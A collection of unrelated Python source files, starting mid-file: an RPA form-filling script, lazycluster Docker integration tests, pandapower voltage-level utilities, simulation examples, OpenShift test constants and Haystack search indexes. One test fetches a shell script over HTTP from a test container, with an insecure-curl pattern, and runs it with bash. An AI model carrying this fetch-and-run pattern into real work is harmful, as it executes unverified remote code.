browser.type_text("css=#lastname", sales_rep["Last Name"])
browser.type_text("css=#salesresult", str(sales_rep["Sales"]))
browser.select_options_by(
"css=#salestarget",
SelectAttribute["value"],
str(sales_rep["Sales Target"]))
browser.click("text=Submit")
def fill_the_form_using_the_data_from_the_excel_file():
excel = Files()
excel.open_workbook("SalesData.xlsx")
sales_reps = excel.read_worksheet_as_table(header=True)
excel.close_workbook()
for sales_rep in sales_reps:
fill_and_submit_the_form_for_one_person(sales_rep)
def collect_the_results():
browser.take_screenshot(
filename=f"{os.getcwd()}/output/sales_summary.png",
selector="css=div.sales-summary")
def export_the_table_as_a_pdf():
sales_results_html = browser.get_property(
selector="css=#sales-results", property="outerHTML")
pdf = PDF()
pdf.html_to_pdf(sales_results_html, "output/sales_results.pdf")
def log_out():
browser.click("text=Log out")
def main():
try:
open_the_intranet_website()
log_in()
download_the_excel_file()
fill_the_form_using_the_data_from_the_excel_file()
collect_the_results()
export_the_table_as_a_pdf()
finally:
log_out()
browser.playwright.close()
if __name__ == "__main__":
main()
|
import os
import re
import sys
import time
from subprocess import PIPE, run
from types import ModuleType
from typing import Union
import docker
import requests
import storm.__main__ as storm
from lazycluster import Runtime, RuntimeGroup, RuntimeManager, RuntimeTask
from .config import RUNTIME_DOCKER_IMAGE, RUNTIME_NAMES, WORKSPACE_PORT
def setup_module(module: ModuleType) -> None:
""" setup any state specific to the execution of the given module."""
docker_client = docker.from_env()
for runtime_name in RUNTIME_NAMES:
_start_runtime_container(runtime_name, docker_client)
# Sleep a moment to give all processes time to start within the Workspace containers
time.sleep(15)
for runtime_name in RUNTIME_NAMES:
_setup_ssh_connection_to_runtime(runtime_name)
def teardown_module(module: ModuleType) -> None:
"""teardown any state that was previously setup with a setup_module
method.
"""
_remove_runtimes()
class TestRuntime:
def test_setup(self) -> None:
for runtime_name in RUNTIME_NAMES:
completed_process = run(
f"ssh {runtime_name} 'echo $WORKSPACE_NAME'",
shell=True,
stdout=PIPE,
stderr=PIPE,
)
assert completed_process.stderr == b"", "The stderr is not empty"
stdout = completed_process.stdout.decode("UTF-8").replace("\n", "")
assert stdout == runtime_name, "Stdout is not equal to the runtime_name"
if not RUNTIME_NAMES:
raise RuntimeError("No runtime names in integration/config.py configured")
Runtime(RUNTIME_NAMES[0])
def test_echo(self) -> None:
runtime_name = RUNTIME_NAMES[len(RUNTIME_NAMES) - 1]
rt = Runtime(runtime_name)
msg = f"Hello Runtime {runtime_name}"
assert rt.echo(msg).rstrip("\n") == msg
def test_working(self) -> None:
runtime_name = RUNTIME_NAMES[0]
exp_working_dir = "/etc"
rt = Runtime(runtime_name, working_dir=exp_working_dir)
act_working_dir = rt.echo("${PWD}").rstrip("\n")
assert exp_working_dir == act_working_dir
task = RuntimeTask("get-working-dir").run_command("echo ${PWD}")
rt.execute_task(task, execute_async=False)
assert exp_working_dir == rt.execution_log(task.name)[0].rstrip("\n").rstrip(
"\r"
)
class TestRuntimeGroup:
def test_creation(self) -> None:
runtime_group = RuntimeGroup(hosts=RUNTIME_NAMES)
for runtime_name in RUNTIME_NAMES:
assert runtime_name in runtime_group._runtimes
assert isinstance(runtime_group._runtimes[runtime_name], Runtime)
class TestRuntimeManager:
def test_create_group(self) -> None:
runtime_group = RuntimeManager().create_group()
for runtime_name in RUNTIME_NAMES:
assert runtime_name in runtime_group._runtimes
assert isinstance(runtime_group._runtimes[runtime_name], Runtime)
# -------------------------------------------------------------------------
def _remove_runtimes() -> None:
docker_client = docker.from_env()
for runtime_name in RUNTIME_NAMES:
try:
runtime_container = docker_client.containers.get(runtime_name)
runtime_container.remove(force=True)
except docker.errors.NotFound:
# TODO: create the docker container if the tests are not running as a containerized test
print(f"Container {runtime_name} not found")
# Delete ssh config as well, because the ssh setup fails
# when testing against multiple python versions
storm.delete(runtime_name)
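# Prints the last path component of /proc/1/cpuset, which inside a Docker
# container (cgroup v1) is the id of the container the process runs in.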
def _get_current_container_id() -> str:
return run(
"awk -F/ '{ print $NF }' /proc/1/cpuset",
shell=True,
stdout=PIPE,
stderr=PIPE,
encoding="UTF-8",
).stdout.rstrip("\n")
def _start_runtime_container(name: str, client: docker.DockerClient) -> None:
try:
container = client.containers.run(
RUNTIME_DOCKER_IMAGE,
name=name,
environment={"WORKSPACE_NAME": name},
detach=True,
)
except docker.errors.APIError:
_remove_runtimes()
raise
container.reload()
ip_address = container.attrs["NetworkSettings"]["Networks"]["bridge"]["IPAddress"]
os.environ[name] = ip_address
_wait_until_started(ip_address, WORKSPACE_PORT)
def _setup_ssh_connection_to_runtime(runtime_name: str) -> None:
runtime_host = os.getenv(runtime_name, "localhost")
response = requests.get(
f"http://{runtime_host}:{WORKSPACE_PORT}/tooling/ssh/setup-command?origin=http://{runtime_host}:{WORKSPACE_PORT}"
)
ssh_script_runner_regex = rf'^\/bin\/bash <\(curl -s --insecure "(http:\/\/{runtime_host}:{WORKSPACE_PORT}\/shared\/ssh\/setup\?token=[a-z0-9]+&host={runtime_host}&port={WORKSPACE_PORT})"\)$'
pattern = re.compile(ssh_script_runner_regex)
match = pattern.match(response.text)
assert match, "SSH setup script url not found"
# Execute the ssh setup script and automatically pass an ssh connection name to the script
script_url = match.groups()[0]
r = requests.get(script_url)
setup_script_path = "./setup-ssh.sh"
_remove_file_if_exists(setup_script_path)
with open(setup_script_path, "w") as file:
file.write(r.text)
# make the file executable for the user
os.chmod(setup_script_path, 0o744)
completed_process = run(
[f'/bin/bash -c "{setup_script_path}"'],
input=runtime_name,
encoding="ascii",
shell=True,
stdout=PIPE,
stderr=PIPE,
)
# child = pexpect.spawn(f"/bin/bash {setup_script_path}", encoding="UTF-8")
# child.expect("Provide a name .*")
# child.sendline(runtime_name)
# child.expect("remote_ikernel was detected .*")
# child.sendline("no")
# child.expect("Do you want to add this connection as mountable SFTP storage .*")
# child.sendline("no")
# child.close()
_remove_file_if_exists(setup_script_path)
assert completed_process.stderr == ""
assert "Connection successful!" in completed_process.stdout
def _wait_until_started(ip_address: str, workspace_port: Union[str, int]) -> None:
index = 0
health_url = f"http://{ip_address}:{str(workspace_port)}/healthy"
response = None
while (response is None or response.status_code != 200) and index < 15:
index += 1
time.sleep(1)
try:
response = requests.get(health_url, allow_redirects=False, timeout=2)
except requests.ConnectionError:
# Catch error that is raised when the workspace container is not reachable yet
pass
if response is None or response.status_code != 200:
print("The workspace did not start")
sys.exit(-1)
def _remove_file_if_exists(path: str) -> None:
try:
os.remove(path)
except OSError:
pass
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 by University of Kassel, Tu Dortmund, RWTH Aachen University and Fraunhofer
# Institute for Energy Economics and Energy System Technology (IEE) Kassel and individual
# contributors (see AUTHORS file for details). All rights reserved.
import numpy as np
from pandas import Series
from pandapower import element_bus_tuples
__author__ = "smeinecke"
def convert_voltlvl_to_int(voltage_level):
""" Returns voltage level names as int. """
if voltage_level in ["EHV", "ehv", "UHV", "uhv"]:
return 1
elif voltage_level in ["EHV-HV", "ehv-hv", "UHV-HV", "uhv-hv", "EHVHV", "ehvhv", "UHVHV",
"uhvhv"]:
return 2
elif voltage_level in ["HV", "hv"]:
return 3
elif voltage_level in ["HV-MV", "hv-mv", "HVMV", "hvmv"]:
return 4
elif voltage_level in ["MV", "mv"]:
return 5
elif voltage_level in ["MV-LV", "mv-lv", "MVLV", "mvlv"]:
return 6
elif voltage_level in ["LV", "lv"]:
return 7
else:
return int(voltage_level)
def convert_voltlvl_to_str(voltage_level):
""" Returns voltage level names as string. """
return ["EHV", "EHV-HV", "HV", "HV-MV", "MV", "MV-LV", "LV"][convert_voltlvl_to_int(
voltage_level)-1]
def convert_voltlvl_names(voltage_levels, desired_format):
""" Returns voltage level names in desired format.
EXAMPLE:
voltlvl_names = convert_voltlvl_names([1, 2, "hv", 4, 5, "ehv", 7], str)
"""
if desired_format == str:
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return convert_voltlvl_to_str(voltage_levels)
else:
names = []
for voltage_level in voltage_levels:
names += [convert_voltlvl_to_str(voltage_level)]
return names
elif desired_format == int:
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return convert_voltlvl_to_int(voltage_levels)
else:
names = []
for voltage_level in voltage_levels:
names += [convert_voltlvl_to_int(voltage_level)]
return names
else:
raise ValueError("desired_format must be str or int")
def _voltlvl_idx(net, element, voltage_level, branch_bus=None, vn_kv_limits=[145, 60, 1]):
""" similar to voltlvl_idx, but for only one voltage_level """
vn_kv_limits = [np.inf] + vn_kv_limits + [-np.inf]
voltage_level = convert_voltlvl_names(voltage_level, int)
lim_max = [0, 0, 1, 1, 2, 2, 3][voltage_level-1]
lim_min = [1, 2, 2, 3, 3, 4, 4][voltage_level-1]
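# lim_max/lim_min select the upper and lower vn_kv limits for the requested level;
# even levels (e.g. 2 == "EHV-HV") span both neighbouring odd levels, see voltlvl_idx.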
Idx_bus = net.bus.index[(net.bus.vn_kv <= vn_kv_limits[lim_max]) &
(net.bus.vn_kv > vn_kv_limits[lim_min])]
if element == "bus":
return list(Idx_bus)
if branch_bus is None and element not in ["trafo", "trafo3w"]:
# for all other elements than trafos, take the first possibility
for elm, bus_name in element_bus_tuples():
if elm == element:
branch_bus = bus_name
break
if element == "measurement":
measurement_buses = Series(index=net.measurement.index)
# bus
bool_ = net.measurement.element_type == "bus"
measurement_buses.loc[bool_] = net.measurement.element.loc[bool_]
# line and trafo
for branch, side in zip(["line", "line", "trafo", "trafo"], ["from", "to", "hv", "lv"]):
bus = side + "_bus"
bool1 = net.measurement.element_type == branch
bool2 = net.measurement.side == side
measurement_buses.loc[bool1 & bool2] = net[branch][bus].loc[net.measurement.element.loc[
bool1 & bool2]].values
measurement_buses = measurement_buses.astype(int)
isin_Idx_bus = measurement_buses.isin(Idx_bus)
elif branch_bus in net[element].columns: # all other elements than measurement and bus
isin_Idx_bus = net[element][branch_bus].isin(Idx_bus)
else:
raise KeyError("For net[%s] there is no column '%s'. Please" % (element, str(branch_bus)) +
" give 'branch_bus' a valid bus column name, e.g. 'hv_bus' or 'lv_bus'.")
return list(net[element].index[isin_Idx_bus])
def voltlvl_idx(net, element, voltage_levels, branch_bus=None, vn_kv_limits=[145, 60, 1]):
"""
Returns indices of elements with special voltage level.
Even voltage_level numbers behave equally to both neighboring numbers, i.e. 4 == [3, 5] and
"EHV-HV" == ["EHV", "HV"].
EXAMPLE:
hv_and_mv_buses = voltlvl_idx(net, "bus", 4) # 4 == [3, 5]
hv_and_mv_buses = voltlvl_idx(net, "bus", [3, 5])
mv_loads = voltlvl_idx(net, "load", "MV")
hvmv_trafos = voltlvl_idx(net, "trafo", "HV", branch_bus="hv_bus")
hvmv_trafos = voltlvl_idx(net, "trafo", "MV", branch_bus="lv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", 2, branch_bus="hv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", [1, 3], branch_bus="hv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", 4, branch_bus="lv_bus")
ehvhv_and_hvmv_trafos = voltlvl_idx(net, "trafo", [3, 5], branch_bus="lv_bus")
ehvhv_trafos = voltlvl_idx(net, "trafo", 2, branch_bus="lv_bus")
ehv_measurements = voltlvl_idx(net, "measurement", "EHV")
"""
if not net[element].shape[0]:
return []
if isinstance(voltage_levels, str) | (not hasattr(voltage_levels, "__iter__")):
return _voltlvl_idx(net, element, voltage_levels, branch_bus=branch_bus,
vn_kv_limits=vn_kv_limits)
else:
Idx = []
for voltage_level in voltage_levels:
Idx += _voltlvl_idx(net, element, voltage_level, branch_bus=branch_bus,
vn_kv_limits=vn_kv_limits)
return Idx
def get_voltlvl(voltage_values, vn_kv_limits=[145, 60, 1]):
""" Returns an array of voltage levels as integer. """
iter_ = hasattr(voltage_values, "__iter__")
voltage_values = voltage_values if iter_ else [voltage_values]
voltage_values = np.array(voltage_values)
voltage_levels = np.ones(voltage_values.shape)
for lim in vn_kv_limits:
voltage_levels[voltage_values <= lim] += 2
if iter_:
return voltage_levels.astype(int)
else:
return int(voltage_levels[0])
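# Quick check with the default limits [145, 60, 1]:
# get_voltlvl([380, 110, 20, 0.4]) -> array([1, 3, 5, 7]), i.e. EHV, HV, MV, LV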
|
"""Example systems created in Python
"""
import numpy as np
from pysim.cythonsystem import Sys
class VanDerPol(Sys):
"""Simple example of a class representing a VanDerPol oscillator.
"""
def __init__(self):
self.add_state_scalar("x", "dx")
self.add_state_scalar("y", "dy")
self.add_input_scalar("a")
self.add_input_scalar("b")
self.inputs.a = 1.0
self.inputs.b = 1.0
self.states.x = 1.0
self.states.y = 0.0
def do_step(self,dummy):
"""Perform a timestep by implmenting the VanDerPol equations"""
a = self.inputs.a
b = self.inputs.b
x = self.states.x
y = self.states.y
self.ders.dx = a*x*(b-y*y)-y
self.ders.dy = x
class MassSpringDamper(Sys):
"""Simple class for testing the mass-spring-damper simulations with
a cython system"""
def __init__(self):
"""Setup two states (one dimensional vectors for now). Initial
conditions are simular to those in the build in c++ system"""
self.add_state_scalar("x1", "dx1")
self.add_state_scalar("x2", "dx2")
self.states.x1 = 1
self.states.x2 = 0
def do_step(self,dummy):
"""Perform a step using default constants, same as those in the
cpp system"""
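# Mass-spring-damper m*x'' + b*x' + k*x = f rewritten as a first-order system:
#   dx1/dt = x2,   dx2/dt = -(k/m)*x1 - (b/m)*x2 + f/m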
m = 100.0
b = 1.0
k = 50.0
f = 0.0
x1 = self.states.x1
x2 = self.states.x2
self.ders.dx1 = x2
self.ders.dx2 =-k/m*x1-b/m*x2+1/m*f
class InOutTestSystem(Sys):
"""Python representation of the cpp InOutTestSystem
Used for testing that the cpp system behaves as the python system
with regards to the input output handling
"""
def __init__(self):
self.add_input_scalar("input_scalar")
self.add_input_vector("input_vector",3)
self.add_input_matrix("input_matrix",3,3)
self.add_state_scalar("state_scalar","der_scalar")
self.add_state_vector("state_vector","der_vector", 3)
self.add_state_matrix("state_matrix","der_matrix", 3, 3)
self.add_output_scalar("input_output_scalar")
self.add_output_vector("input_output_vector",3)
self.add_output_matrix("input_output_matrix",3,3)
self.add_output_scalar("state_output_scalar")
self.add_output_vector("state_output_vector",3)
self.add_output_matrix("state_output_matrix",3,3)
self.inputs.input_scalar = 0.0
self.inputs.input_vector = [0.0, 0.0, 0.0]
self.inputs.input_matrix = np.zeros((3,3))
self.outputs.input_output_scalar = 0.0
self.outputs.input_output_vector = [0.0, 0.0, 0.0]
self.outputs.input_output_matrix = np.zeros((3,3))
self.outputs.state_output_scalar = 0.0
self.outputs.state_output_vector = [0.0, 0.0, 0.0]
self.outputs.state_output_matrix = np.zeros((3,3))
self.states.state_scalar = 1.23
self.states.state_vector = np.ones(3)*4.56
self.states.state_matrix = np.ones((3,3))*7.89
self.ders.der_scalar = 0
self.ders.der_vector = np.zeros(3)
self.ders.der_matrix = np.zeros((3,3))
def do_step(self,dummy):
"""During a timestep we set the outputs to their respective inputs"""
self.outputs.input_output_scalar = self.inputs.input_scalar
self.outputs.input_output_vector = self.inputs.input_vector
self.outputs.input_output_matrix = self.inputs.input_matrix
self.outputs.state_output_scalar = self.states.state_scalar
self.outputs.state_output_vector = self.states.state_vector
self.outputs.state_output_matrix = self.states.state_matrix
|
from enum import Enum
from .durations import MINUTE, HOUR
class OpenshiftVersion(Enum):
VERSION_4_6 = "4.6"
VERSION_4_7 = "4.7"
VERSION_4_8 = "4.8"
VERSION_4_9 = "4.9"
class NetworkType:
OpenShiftSDN = "OpenShiftSDN"
OVNKubernetes = "OVNKubernetes"
WORKING_DIR = "build"
TF_FOLDER = f"{WORKING_DIR}/terraform"
TFVARS_JSON_NAME = "terraform.tfvars.json"
IMAGE_FOLDER = "/tmp/test_images"
TF_MAIN_JSON_NAME = "main.tf"
BASE_IMAGE_FOLDER = "/tmp/images"
IMAGE_NAME = "installer-image.iso"
STORAGE_PATH = "/var/lib/libvirt/openshift-images"
HOST_PASSTHROUGH_CPU_MODE = "host-passthrough"
MASTER_TF_CPU_MODE = HOST_PASSTHROUGH_CPU_MODE
WORKER_TF_CPU_MODE = HOST_PASSTHROUGH_CPU_MODE
NODES_REGISTERED_TIMEOUT = 20 * MINUTE
DEFAULT_CHECK_STATUSES_INTERVAL = 5
CLUSTER_INSTALLATION_TIMEOUT = HOUR
CLUSTER_INSTALLATION_TIMEOUT_OCS = 95 * MINUTE
START_CLUSTER_INSTALLATION_TIMEOUT = 6 * MINUTE
INSTALLING_IN_PROGRESS_TIMEOUT = 15 * MINUTE
VALIDATION_TIMEOUT = 6 * MINUTE
NTP_VALIDATION_TIMEOUT = 10 * MINUTE
OCS_VALIDATION_TIMEOUT = 10 * MINUTE
CNV_VALIDATION_TIMEOUT = 10 * MINUTE
READY_TIMEOUT = 15 * MINUTE
DISCONNECTED_TIMEOUT = 10 * MINUTE
PENDING_USER_ACTION_TIMEOUT = 30 * MINUTE
ERROR_TIMEOUT = 10 * MINUTE
TF_TEMPLATES_ROOT = "terraform_files"
TF_TEMPLATE_BARE_METAL_FLOW = f"{TF_TEMPLATES_ROOT}/baremetal"
TF_TEMPLATE_NONE_PLATFORM_FLOW = f"{TF_TEMPLATES_ROOT}/none"
TF_TEMPLATE_BARE_METAL_INFRA_ENV_FLOW = f"{TF_TEMPLATES_ROOT}/baremetal_infra_env"
TF_NETWORK_POOL_PATH = "/tmp/tf_network_pool.json"
NUMBER_OF_MASTERS = 3
TEST_INFRA = "test-infra"
CLUSTER = CLUSTER_PREFIX = "%s-cluster" % TEST_INFRA
INFRA_ENV_PREFIX = "%s-infra-env" % TEST_INFRA
TEST_NETWORK = "test-infra-net-"
TEST_SECONDARY_NETWORK = "test-infra-secondary-network-"
DEFAULT_CLUSTER_KUBECONFIG_DIR_PATH = "build/kubeconfig"
WAIT_FOR_BM_API = 15 * MINUTE
NAMESPACE_POOL_SIZE = 15
PODMAN_FLAGS = "--cgroup-manager=cgroupfs --storage-driver=vfs --events-backend=file"
DEFAULT_ADDITIONAL_NTP_SOURCE = "clock.redhat.com"
DEFAULT_BASE_DNS_DOMAIN = "redhat.com"
DEFAULT_NAMESPACE = 'assisted-installer'
DEFAULT_TEST_INFRA_DOMAIN = f".{CLUSTER_PREFIX}-{DEFAULT_NAMESPACE}.{DEFAULT_BASE_DNS_DOMAIN}"
TEST_TARGET_INTERFACE = "vnet3"
SUFFIX_LENGTH = 8
OCP_VERSIONS_JSON_PATH = "assisted-service/data/default_ocp_versions.json"
DEFAULT_IPV6_SERVICE_CIDR = "2003:db8::/112"
DEFAULT_IPV6_CLUSTER_CIDR = "2002:db8::/53"
DEFAULT_IPV6_HOST_PREFIX = 64
DEFAULT_PROXY_SERVER_PORT = 3129
DEFAULT_LOAD_BALANCER_PORT = 6443
IP_NETWORK_ASSET_FIELDS = (
"machine_cidr",
"machine_cidr6",
"provisioning_cidr",
"provisioning_cidr6",
)
REQUIRED_ASSET_FIELDS = (
"libvirt_network_if",
"libvirt_secondary_network_if",
*IP_NETWORK_ASSET_FIELDS,
)
class ImageType:
FULL_ISO = "full-iso"
MINIMAL_ISO = "minimal-iso"
class NodeRoles:
WORKER = "worker"
MASTER = "master"
AUTO_ASSIGN = "auto-assign"
class NodesStatus:
INSUFFICIENT = "insufficient"
KNOWN = "known"
INSTALLING = "installing"
INSTALLING_IN_PROGRESS = "installing-in-progress"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
INSTALLED = "installed"
ERROR = "error"
PENDING_FOR_INPUT = "pending-for-input"
DAY2_INSTALLED = "added-to-existing-cluster"
RESETING_PENDING_USER_ACTION = "resetting-pending-user-action"
DISCONNECTED = "disconnected"
INSUFFICIENT_UNBOUND = "insufficient-unbound"
KNOWN_UNBOUND = "known-unbound"
class ClusterStatus:
INSUFFICIENT = "insufficient"
INSTALLED = "installed"
READY = "ready"
PREPARING_FOR_INSTALLATION = "preparing-for-installation"
INSTALLING = "installing"
FINALIZING = "finalizing"
ERROR = "error"
PENDING_FOR_INPUT = "pending-for-input"
CANCELLED = "cancelled"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
class HostsProgressStages:
START_INSTALLATION = "Starting installation"
INSTALLING = "Installing"
WRITE_IMAGE_TO_DISK = "Writing image to disk"
WAIT_FOR_CONTROL_PLANE = "Waiting for control plane"
REBOOTING = "Rebooting"
WAIT_FOR_IGNITION = "Waiting for ignition"
JOINED = "Joined"
CONFIGURING = "Configuring"
DONE = "Done"
class AgentStatus:
VALIDATED = "Validated"
INSTALLED = "Installed"
REQUIREMENTS_MET = "RequirementsMet"
all_host_stages = [HostsProgressStages.START_INSTALLATION, HostsProgressStages.INSTALLING,
HostsProgressStages.WRITE_IMAGE_TO_DISK, HostsProgressStages.WAIT_FOR_CONTROL_PLANE,
HostsProgressStages.REBOOTING, HostsProgressStages.WAIT_FOR_IGNITION,
HostsProgressStages.CONFIGURING, HostsProgressStages.JOINED, HostsProgressStages.DONE]
class Events:
REGISTERED_CLUSTER = "Registered cluster"
SUCCESSFULLY_REGISTERED_CLUSTER = "Successfully registered cluster"
PENDING_FOR_INPUT = "to pending-for-input"
GENERATED_IMAGE = "Generated image (SSH public key is set)"
GENERATED_IMAGE_FULL = "Generated image (Image type is \"full-iso\", SSH public key is set)"
GENERATED_IMAGE_MINIMAL = "Generated image (Image type is \"minimal-iso\", SSH public key is set)"
DOWNLOAD_IMAGE = "Started image download"
STARTED_DOWNLOAD_IMAGE = "Started image download (image type is \"full-iso\")"
HOST_REGISTERED_TO_CLUSTER = ": registered to cluster"
INSUFFICIENT = "insufficient"
KNOWN = "to \"known\""
READY = "to ready"
CLUSTER_VALIDATION = "Cluster validation \'all-hosts-are-ready-to-install\' is now fixed"
PREPARING_FOR_INSTALLATION = "updated status from \"known\" to \"preparing-for-installation\""
PREPARING_SUCCESSFUL = "updated status from \"preparing-for-installation\" to \"preparing-successful\""
SET_BOOTSTRAP = "set as bootstrap"
INSTALLING = "updated status from \"preparing-successful\" to \"installing\""
CLUSTER_PREPARED = "Cluster was prepared successfully for installation"
CLUSTER_INSTALLING = "to installing"
INSTALLING_IN_PROGRESS = "updated status from \"installing\" to \"installing-in-progress\""
INSTALLATION_STAGE = "reached installation stage Starting installation"
INSTALLING_PENDING_USER_ACTION = "installing-pending-user-action"
WRITING_IMAGE_TO_DISK = "reached installation stage Writing image to disk"
REBOOTING = "reached installation stage Rebooting"
CONTROL_PLANE = "reached installation stage Waiting for control plane"
IGNITION = "reached installation stage Waiting for ignition"
CONFIGURING = "reached installation stage Configuring"
JOINED = "reached installation stage Joined"
DONE = "reached installation stage Done"
CANCELLED_CLUSTER_INSTALLATION = "Cancelled cluster installation"
CANCELLED_FOR_HOST = "Installation cancelled for host"
CLUSTER_VERSION_DONE = "Operator cvo status: available message: Done"
CANCELLED_STATUS = "to \"cancelled\""
RESET_CLUSTER_INSTALLATION = "Reset cluster installation"
RESET_FOR_HOST = "Installation reset for host"
RESETTING_PENDING_USER_ACTION = "updated status from \"cancelled\" to \"resetting-pending-user-action\""
INSTALLED = "updated status from \"installing-in-progress\" to \"installed\""
FINALIZING = "to finalizing"
SUCCESSFULLY_INSTALLED = "Successfully finished installing cluster"
ERROR = "error"
DAY2_INSTALLED = "added-to-existing-cluster"
PROXY_SETTINGS_CHANGED = "Proxy settings changed"
class HostStatusInfo:
WRONG_BOOT_ORDER = "Expected the host to boot from disk, but it booted the installation image"
REBOOT_TIMEOUT = "Host failed to reboot within timeout"
class Platforms:
BARE_METAL = 'baremetal'
NONE = 'none'
VSPHERE = 'vsphere'
class HighAvailabilityMode:
FULL = 'Full'
NONE = 'None'
class BaseAsset:
MACHINE_CIDR = "192.168.127.0/24"
MACHINE_CIDR6 = "1001:db9::/120"
PROVISIONING_CIDR = "192.168.145.0/24"
PROVISIONING_CIDR6 = "3001:db9::/120"
NETWORK_IF = "tt1"
SECONDARY_NETWORK_IF = "stt1"
|
from gym.envs.registration import register
register(
id='SimpleFlappy-v0',
entry_point='gym_simpleflappy.envs:FlappyEnv',
)
register(
id='SimpleFlappyDistance-v0',
entry_point='gym_simpleflappy.envs:FlappyEnvDistance',
)
|
from haystack import indexes
from peeldb.models import (
JobPost,
Skill,
City,
FunctionalArea,
Industry,
Qualification,
State,
)
from datetime import datetime
from django.core import serializers
from mpcomp.views import get_absolute_url
class jobIndex(indexes.SearchIndex, indexes.Indexable):
"""
Indexing for job model
"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/job_text.txt"
)
title = indexes.CharField(model_attr="title")
designation = indexes.CharField(model_attr="job_role")
job_type = indexes.CharField(model_attr="job_type", faceted=True)
skills = indexes.MultiValueField()
location = indexes.MultiValueField()
slug = indexes.CharField(model_attr="slug")
min_year = indexes.IntegerField(model_attr="min_year")
max_year = indexes.IntegerField(model_attr="max_year")
min_month = indexes.IntegerField(model_attr="min_month")
max_month = indexes.IntegerField(model_attr="max_month")
min_salary = indexes.FloatField()
max_salary = indexes.FloatField()
industry = indexes.MultiValueField()
edu_qualification = indexes.MultiValueField()
functional_area = indexes.MultiValueField()
walkin_from_date = indexes.DateField(null=True, model_attr="walkin_from_date")
walkin_to_date = indexes.DateField(null=True, model_attr="walkin_to_date")
status = indexes.CharField(model_attr="status")
# posted_on = indexes.DateField(model_attr='posted_on')
created_on = indexes.DateField(model_attr="created_on")
description = indexes.CharField(model_attr="description")
post_url = indexes.CharField()
company_name = indexes.CharField(model_attr="company_name")
company = indexes.CharField(model_attr="company", null=True)
published_on = indexes.DateField(model_attr="published_on", null=True)
def get_model(self):
return JobPost
def prepare_post_url(self, obj):
return get_absolute_url(obj)
def prepare_skills(self, obj):
return [str(s.name) for s in obj.skills.filter(status="Active")]
def prepare_location(self, obj):
locations = serializers.serialize("json", obj.location.all())
return locations
def prepare_industry(self, obj):
return [str(s.name) for s in obj.industry.all()]
def prepare_functional_area(self, obj):
return [str(l.name) for l in obj.functional_area.all()]
def prepare_min_salary(self, obj):
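# min_salary/max_salary are stored as absolute amounts; dividing by 100000
# presumably expresses them in lakhs (1 lakh = 100,000).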
if int(obj.min_salary) > 0:
return float(obj.min_salary) / 100000
else:
return 0.0
def prepare_max_salary(self, obj):
if int(obj.max_salary) > 0:
return float(obj.max_salary) / 100000
else:
return 0.0
def prepare_created_on(self, obj):
if obj.created_on:
current_date = datetime.strptime(str(obj.created_on), "%Y-%m-%d").strftime(
"%Y-%m-%d"
)
return current_date
return None
def prepare_published_on(self, obj):
if obj.published_on:
current_date = datetime.strptime(
str(obj.published_on.date()), "%Y-%m-%d"
).strftime("%Y-%m-%d")
return current_date
return None
def prepare_edu_qualification(self, obj):
return [str(s.name) for s in obj.edu_qualification.filter(status="Active")]
# def prepare_walkin_from_date(self, obj):
# if obj.walkin_from_date:
# current_date = datetime.strptime(str(obj.walkin_from_date), "%Y-%m-%d").strftime("%Y-%m-%d 00:00:00")
# return current_date
# return None
# def prepare_walkin_to_date(self, obj):
# if obj.walkin_to_date:
# current_date = datetime.strptime(str(obj.walkin_to_date), "%Y-%m-%d").strftime("%Y-%m-%d 00:00:00")
# return current_date
# return None
def index_queryset(self, using=None):
# from datetime import datetime
# current_date = datetime.strptime(str(datetime.now().date()), "%Y-%m-%d").strftime("%Y-%m-%d")
return (
self.get_model()
.objects.filter(status="Live")
.select_related("company", "user")
.prefetch_related(
"location", "edu_qualification", "industry", "skills", "functional_area"
)
)
class skillautoIndex(indexes.SearchIndex, indexes.Indexable):
"""
Index for autocomplete of designation and skills
"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/skill_text.txt"
)
skill_name = indexes.CharField(model_attr="name")
skill_slug = indexes.CharField(model_attr="slug")
no_of_jobposts = indexes.CharField()
status = indexes.CharField(model_attr="status")
def get_model(self):
return Skill
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Active")
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class locationIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/city_text.txt"
)
city_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
status = indexes.CharField(model_attr="status")
def get_model(self):
return City
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Enabled")
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class industryIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/industry_text.txt"
)
industry_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
industry_slug = indexes.CharField(model_attr="slug")
def get_model(self):
return Industry
def index_queryset(self, using=None):
return self.get_model().objects.all()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class functionalareaIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/functionalarea_text.txt"
)
functionalarea_name = indexes.CharField(model_attr="name")
no_of_jobposts = indexes.CharField()
def get_model(self):
return FunctionalArea
def index_queryset(self, using=None):
return self.get_model().objects.all()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
class qualificationIndex(indexes.SearchIndex, indexes.Indexable):
""" index for loacation"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/qualification_text.txt"
)
edu_name = indexes.CharField(model_attr="name")
edu_slug = indexes.CharField(model_attr="slug")
no_of_jobposts = indexes.CharField()
def get_model(self):
return Qualification
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Active")
class stateIndex(indexes.SearchIndex, indexes.Indexable):
""" index for State"""
text = indexes.CharField(
document=True, use_template=True, template_name="index/state_text.txt"
)
